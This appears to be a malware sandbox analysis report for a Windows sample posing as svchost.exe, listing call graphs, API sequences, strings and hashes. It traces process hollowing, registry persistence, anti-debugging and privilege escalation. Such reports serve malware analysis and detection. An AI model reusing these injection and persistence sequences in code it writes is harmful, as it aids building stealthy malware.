RegCloseKey 1267->1269 1268->1079 1269->1268 1276 7ff6eef22fe0 1281 7ff6eef22fe9 1276->1281 1277 7ff6eef230d5 1280 7ff6eef23b28 RegDeleteKeyW 1280->1281 1281->1277 1281->1280 1282 7ff6eef23d28 9 API calls 1281->1282 1283 7ff6eef238b8 3 API calls 1281->1283 1285 7ff6eef244c8 CreateFileW 1281->1285 1290 7ff6eef23a88 RegOpenKeyExW 1281->1290 1282->1281 1284 7ff6eef230c5 Sleep 1283->1284 1284->1281 1286 7ff6eef2455e 1285->1286 1287 7ff6eef24523 1285->1287 1286->1281 1293 7ff6eef24448 SetFilePointer WriteFile SetEndOfFile 1287->1293 1289 7ff6eef2453f SetFileAttributesW CloseHandle 1289->1286 1291 7ff6eef23b16 1290->1291 1292 7ff6eef23adc RegSetValueExW RegCloseKey 1290->1292 1291->1281 1292->1291 1293->1289 1294 7ff6eef22ed0 1295 7ff6eef21c20 22 API calls 1294->1295 1296 7ff6eef22f04 1295->1296 1297 7ff6eef23fc8 5 API calls 1296->1297 1298 7ff6eef22f27 1297->1298 1299 7ff6eef23fe8 13 API calls 1298->1299 1300 7ff6eef22f3c GetProcessHeap HeapFree 1299->1300 1301 7ff6eef232d0 1304 7ff6eef21f8c GetModuleFileNameW 1301->1304 1305 7ff6eef2200d 1304->1305 1311 7ff6eef22008 1304->1311 1306 7ff6eef2204b 1305->1306 1307 7ff6eef22061 1305->1307 1309 7ff6eef2207f 1306->1309 1310 7ff6eef22055 1306->1310 1347 7ff6eef21ecc ExpandEnvironmentStringsW 1307->1347 1348 7ff6eef21f0c ExpandEnvironmentStringsW 1309->1348 1310->1311 1349 7ff6eef21f4c ExpandEnvironmentStringsW 1310->1349 1312 7ff6eef22076 1312->1311 1315 7ff6eef220d1 CreateProcessW 1312->1315 1315->1311 1316 7ff6eef2212c CreateFileW 1315->1316 1316->1311 1317 7ff6eef22173 GetFileSize 1316->1317 1318 7ff6eef2219b CloseHandle 1317->1318 1319 7ff6eef22191 1317->1319 1318->1311 1319->1318 1320 7ff6eef221ab VirtualAlloc 1319->1320 1321 7ff6eef221e5 ReadFile 1320->1321 1322 7ff6eef221d5 CloseHandle 1320->1322 1323 7ff6eef22212 VirtualFree CloseHandle 1321->1323 1324 7ff6eef22235 CloseHandle GetThreadContext 1321->1324 1322->1311 1323->1311 1325 7ff6eef2229d ReadProcessMemory GetModuleHandleA GetProcAddress 1324->1325 1326 7ff6eef22285 VirtualFree 1324->1326 1327 7ff6eef22320 1325->1327 1326->1311 1328 7ff6eef2233c VirtualAllocEx 1327->1328 1329 7ff6eef22324 VirtualFree 1327->1329 1330 7ff6eef223a7 VirtualFree 1328->1330 1331 7ff6eef223bf WriteProcessMemory 1328->1331 1329->1311 1330->1311 1332 7ff6eef223f5 VirtualFree 1331->1332 1334 7ff6eef2240d 1331->1334 1332->1311 1333 7ff6eef22443 WriteProcessMemory 1333->1334 1335 7ff6eef224ce VirtualFree 1333->1335 1334->1333 1338 7ff6eef224eb 1334->1338 1335->1311 1336 7ff6eef2255d RtlCompareMemory 1336->1338 1344 7ff6eef225b0 1336->1344 1337 7ff6eef227dc WriteProcessMemory SetThreadContext 1339 7ff6eef22877 ResumeThread 1337->1339 1340 7ff6eef22862 VirtualFree 1337->1340 1338->1336 1338->1337 1341 7ff6eef22889 VirtualFree 1339->1341 1342 7ff6eef2289e VirtualFree 1339->1342 1340->1311 1341->1311 1342->1311 1343 7ff6eef227d7 1343->1337 1344->1343 1345 7ff6eef226e0 ReadProcessMemory WriteProcessMemory 1344->1345 1345->1344 1346 7ff6eef227b5 VirtualFree 1345->1346 1346->1311 1347->1312 1348->1312 1349->1312 1350 7ff6eef230f0 1351 7ff6eef230f9 1350->1351 1352 7ff6eef23112 1351->1352 1355 7ff6eef22f70 1351->1355 1360 7ff6eef22e30 CreateMutexA 1355->1360 1358 7ff6eef22f8b Sleep CreateThread WaitForSingleObject 1359 7ff6eef22fd0 Sleep 1358->1359 1359->1351 1361 7ff6eef22e79 GetLastError 1360->1361 1362 7ff6eef22e5c ReleaseMutex CloseHandle 1360->1362 1364 7ff6eef22e86 ReleaseMutex CloseHandle 1361->1364 1365 7ff6eef22ea3 ReleaseMutex CloseHandle 1361->1365 1363 7ff6eef22ebb 1362->1363 1363->1358 1363->1359 1364->1363 1365->1363 1366 7ff6eef23290 1367 7ff6eef21f8c 36 API calls 1366->1367 1368 7ff6eef232a0 1367->1368 1369 7ff6eef22db0 1370 7ff6eef237c8 11 API calls 1369->1370 1371 7ff6eef22dc0 1370->1371 1376 7ff6eef24808 CreateFileW 1371->1376 1374 7ff6eef24808 17 API calls 1375 7ff6eef22e11 1374->1375 1377 7ff6eef22deb 1376->1377 1378 7ff6eef2486e GetFileSize GetProcessHeap HeapAlloc 1376->1378 1377->1374 1379 7ff6eef248b7 CloseHandle 1378->1379 1380 7ff6eef248c9 ReadFile 1378->1380 1379->1377 1381 7ff6eef24918 1380->1381 1382 7ff6eef248f0 GetProcessHeap HeapFree CloseHandle 1380->1382 1383 7ff6eef24931 GetProcessHeap HeapFree CloseHandle 1381->1383 1385 7ff6eef24959 1381->1385 1382->1377 1383->1377 1384 7ff6eef24b03 GetProcessHeap HeapFree CloseHandle 1384->1377 1385->1384 1386 7ff6eef24a14 GetProcessHeap HeapAlloc 1385->1386 1387 7ff6eef24a61 1385->1387 1386->1387 1387->1384

                                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                                                                                                                    • Disassembly available
                                                                                                                                                                                                                                                    callgraph 0 Function_00007FF6EEF238B8 1 Function_00007FF6EEF243B8 34 Function_00007FF6EEF24308 1->34 2 Function_00007FF6EEF228BC 3 Function_00007FF6EEF249BF 27 Function_00007FF6EEF24578 3->27 41 Function_00007FF6EEF24798 3->41 4 Function_00007FF6EEF23648 43 Function_00007FF6EEF23618 4->43 5 Function_00007FF6EEF24448 6 Function_00007FF6EEF237C8 6->4 7 Function_00007FF6EEF23FC8 32 Function_00007FF6EEF23F08 7->32 8 Function_00007FF6EEF244C8 8->5 9 Function_00007FF6EEF21F4C 10 Function_00007FF6EEF229CC 10->2 11 Function_00007FF6EEF21ECC 12 Function_00007FF6EEF21050 13 Function_00007FF6EEF22ED0 13->7 19 Function_00007FF6EEF23B68 13->19 20 Function_00007FF6EEF23FE8 13->20 47 Function_00007FF6EEF21C20 13->47 14 Function_00007FF6EEF232D0 37 Function_00007FF6EEF21F8C 14->37 15 Function_00007FF6EEF23A58 16 Function_00007FF6EEF23360 18 Function_00007FF6EEF24168 16->18 21 Function_00007FF6EEF23BE8 16->21 23 Function_00007FF6EEF232F0 16->23 26 Function_00007FF6EEF23978 16->26 29 Function_00007FF6EEF23180 16->29 40 Function_00007FF6EEF23210 16->40 42 Function_00007FF6EEF23E18 16->42 45 Function_00007FF6EEF210A0 16->45 46 Function_00007FF6EEF23120 16->46 48 Function_00007FF6EEF242A8 16->48 17 Function_00007FF6EEF22FE0 17->0 17->8 33 Function_00007FF6EEF23A88 17->33 50 Function_00007FF6EEF23B28 17->50 51 Function_00007FF6EEF23D28 17->51 18->15 49 Function_00007FF6EEF23A28 18->49 28 Function_00007FF6EEF22BFC 20->28 22 Function_00007FF6EEF22F70 54 Function_00007FF6EEF22E30 22->54 24 Function_00007FF6EEF230F0 24->22 25 Function_00007FF6EEF235F0 26->0 26->4 26->6 28->10 29->1 29->6 30 Function_00007FF6EEF21000 31 Function_00007FF6EEF23600 34->15 35 Function_00007FF6EEF24808 35->27 35->41 36 Function_00007FF6EEF2350D 37->9 37->11 38 Function_00007FF6EEF21F0C 37->38 39 Function_00007FF6EEF23290 39->37 40->6 40->7 40->19 40->20 40->47 44 Function_00007FF6EEF234A1 45->12 45->30 52 Function_00007FF6EEF22DB0 52->6 52->35 53 Function_00007FF6EEF232B0 53->37

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 00007FF6EEF23360 Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 143COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 217 7ff6eef23360-7ff6eef23376 call 7ff6eef210a0 call 7ff6eef23120 222 7ff6eef23378-7ff6eef2337a ExitProcess 217->222 223 7ff6eef23380-7ff6eef233ae call 7ff6eef24168 call 7ff6eef23be8 call 7ff6eef23e18 217->223 230 7ff6eef233ff-7ff6eef23412 call 7ff6eef23e18 223->230 231 7ff6eef233b0-7ff6eef233c1 call 7ff6eef242a8 223->231 236 7ff6eef23450-7ff6eef23463 call 7ff6eef23e18 230->236 237 7ff6eef23414-7ff6eef23425 call 7ff6eef242a8 230->237 238 7ff6eef233d6-7ff6eef233d8 ExitProcess 231->238 239 7ff6eef233c3-7ff6eef233d4 call 7ff6eef242a8 231->239 246 7ff6eef234a6-7ff6eef234bc call 7ff6eef23978 call 7ff6eef232f0 236->246 247 7ff6eef23465-7ff6eef23476 call 7ff6eef242a8 236->247 248 7ff6eef23427-7ff6eef23429 ExitProcess 237->248 249 7ff6eef2342f call 7ff6eef23180 237->249 239->238 250 7ff6eef233de call 7ff6eef23210 239->250 268 7ff6eef234be-7ff6eef234cf call 7ff6eef242a8 246->268 269 7ff6eef23512-7ff6eef235d4 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 246->269 261 7ff6eef23478-7ff6eef2347a ExitProcess 247->261 262 7ff6eef23480 call 7ff6eef23180 247->262 257 7ff6eef23434-7ff6eef23439 249->257 255 7ff6eef233e3-7ff6eef233e8 250->255 259 7ff6eef233f7-7ff6eef233f9 ExitProcess 255->259 260 7ff6eef233ea-7ff6eef233f5 SleepEx 255->260 263 7ff6eef23448-7ff6eef2344a ExitProcess 257->263 264 7ff6eef2343b-7ff6eef23446 Sleep 257->264 260->255 270 7ff6eef23485-7ff6eef2348a 262->270 264->257 275 7ff6eef234d1-7ff6eef234e2 call 7ff6eef242a8 268->275 276 7ff6eef234e4-7ff6eef234e6 ExitProcess 268->276 272 7ff6eef23499-7ff6eef2349b ExitProcess 270->272 273 7ff6eef2348c-7ff6eef23497 Sleep 270->273 273->270 275->276 279 7ff6eef234ec call 7ff6eef23210 275->279 281 7ff6eef234f1-7ff6eef234f6 279->281 282 7ff6eef234f8-7ff6eef23503 Sleep 281->282 283 7ff6eef23505-7ff6eef23507 ExitProcess 281->283 282->281
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                                                    • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_VznLpbPuTg$worker_VznLpbPuTg$worker_ZLpjbmHstE$worker_pPCJtqmKMc
                                                                                                                                                                                                                                                    • API String ID: 613740775-1274706621
                                                                                                                                                                                                                                                    • Opcode ID: dd24a58d3b1a77ae44d76c1db29b79fb975b52041df41111a9558a24d067cb84
                                                                                                                                                                                                                                                    • Instruction ID: 4f3f26f10193541c782b378c534e08c91727996fe168a9f7c290931b19cf4f9f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dd24a58d3b1a77ae44d76c1db29b79fb975b52041df41111a9558a24d067cb84
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A611D62E1D6C391FB646B31A8153FA2250BFB8701F524135F44EC71E5CFAFE809921A
                                                                                                                                                                                                                                                    Function 00007FF6EEF23FE8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75synchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                    • API String ID: 2379135442-2896544425
                                                                                                                                                                                                                                                    • Opcode ID: 94645651470d070a51f1cdb170c7734c28d4b19bea71717cc88f8f06bffa0438
                                                                                                                                                                                                                                                    • Instruction ID: 3253df51fd71e254a3d0e5a386c51ba3300a8c1658853dcc65f22b16727d67a6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94645651470d070a51f1cdb170c7734c28d4b19bea71717cc88f8f06bffa0438
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD413D32918AC186E750CB11F4443AAB7A0FBE8754F114135FA8987A98CFFED448CF45
                                                                                                                                                                                                                                                    Function 00007FF6EEF24168 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 434396405-0
                                                                                                                                                                                                                                                    • Opcode ID: 5572af213e5128c0dc0009257d67e79a385e61fda350e8b67cdc156981955163
                                                                                                                                                                                                                                                    • Instruction ID: 04b7a9e10882058c3be0e45d4b563c28d711ab3c34153b63d3101f9670b385cd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5572af213e5128c0dc0009257d67e79a385e61fda350e8b67cdc156981955163
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E31F936A1C68186E750CB55E45076EB7A0FBE8780F115035FA8E83BA8DFBDD4418F05
                                                                                                                                                                                                                                                    Function 00007FF6EEF22BFC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82memoryinjectionCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 4073123320-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: a0d1b69305b19612fe7fc462b48fcf683c387df21fe0cb8043b32751d69db5ac
                                                                                                                                                                                                                                                    • Instruction ID: ed6ad7fb470ecbb654ceefe8923da2bb197d6a16cae813fbf6be3ce16bef36f2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0d1b69305b19612fe7fc462b48fcf683c387df21fe0cb8043b32751d69db5ac
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C41D332A08AC186E770CF15F4447AAB7A0F7A8784F104025EACD87B98DFBED4448B45
                                                                                                                                                                                                                                                    Function 00007FF6EEF21C20 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF6EEF21C5D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocFileProcessRead
                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                    • API String ID: 4279794846-2771526726
                                                                                                                                                                                                                                                    • Opcode ID: 05c2d7b87d8a1ab0c1e18b5bab3812d0fa748d1b477535254b84bd01a2c681c4
                                                                                                                                                                                                                                                    • Instruction ID: 485ca41c2b623dffeb119e397cafc8edf7ab8ee1df7275cb8f91ce557d75fc80
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05c2d7b87d8a1ab0c1e18b5bab3812d0fa748d1b477535254b84bd01a2c681c4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9471FB3691CA81C2E7508F55F4547AAB760FBE8794F511035FA8E83AA8CFBED4448B09
                                                                                                                                                                                                                                                    Function 00007FF6EEF237C8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23648: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6EEF23688
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23648: GetVolumeInformationW.KERNELBASE ref: 00007FF6EEF23705
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23648: wsprintfW.USER32 ref: 00007FF6EEF237A6
                                                                                                                                                                                                                                                    • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF239AD), ref: 00007FF6EEF23811
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF239AD), ref: 00007FF6EEF23826
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF239AD), ref: 00007FF6EEF23839
                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF239AD), ref: 00007FF6EEF23849
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF239AD), ref: 00007FF6EEF2385C
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF239AD), ref: 00007FF6EEF23871
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF239AD), ref: 00007FF6EEF23884
                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF239AD), ref: 00007FF6EEF23899
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID: .exe
                                                                                                                                                                                                                                                    • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                                                    • Opcode ID: 3aeed0ae5e945fe983becefaf4d66907a9a6eca11cfa11c5779a9d85c8080902
                                                                                                                                                                                                                                                    • Instruction ID: 3baf44dae25ea882912209431c62b7f244605f7c4a6e776a4efbc11632b57e9d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3aeed0ae5e945fe983becefaf4d66907a9a6eca11cfa11c5779a9d85c8080902
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05114262629DC296DB60CB25F8507AA6331FFE8781F415031EA4E87A28EF7DD048C709
                                                                                                                                                                                                                                                    Function 00007FF6EEF23F08 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2850635065-0
                                                                                                                                                                                                                                                    • Opcode ID: 91519d95aebb1ba755c71d7141713d98d6ee5f27cacd410b46c5de41f993dc97
                                                                                                                                                                                                                                                    • Instruction ID: f8f2ff5227a7ea8e820c29fd12764883449b338f278c2980835c16e16e83ba11
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91519d95aebb1ba755c71d7141713d98d6ee5f27cacd410b46c5de41f993dc97
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F112172A0D6C281E7709B10F4483AA63A0FBA8754F114235E69D836D8DF7ED404DB05
                                                                                                                                                                                                                                                    Function 00007FF6EEF23648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                                                    • API String ID: 3001812590-640692576
                                                                                                                                                                                                                                                    • Opcode ID: 7df018cf59f0a70d05929fc8b75d38fd6e213b17dbb89485f2078f182261baa5
                                                                                                                                                                                                                                                    • Instruction ID: a8de18233c646a6bda30bd40058671ed8f1b71d6e6f6a7d1175d027a0b1abdee
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7df018cf59f0a70d05929fc8b75d38fd6e213b17dbb89485f2078f182261baa5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03311A6661D5C2C6DB30DB20E4887AAB7A0FBA8700F410136E28DC7A58EF7EC508CB05
                                                                                                                                                                                                                                                    Function 00007FF6EEF23120 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
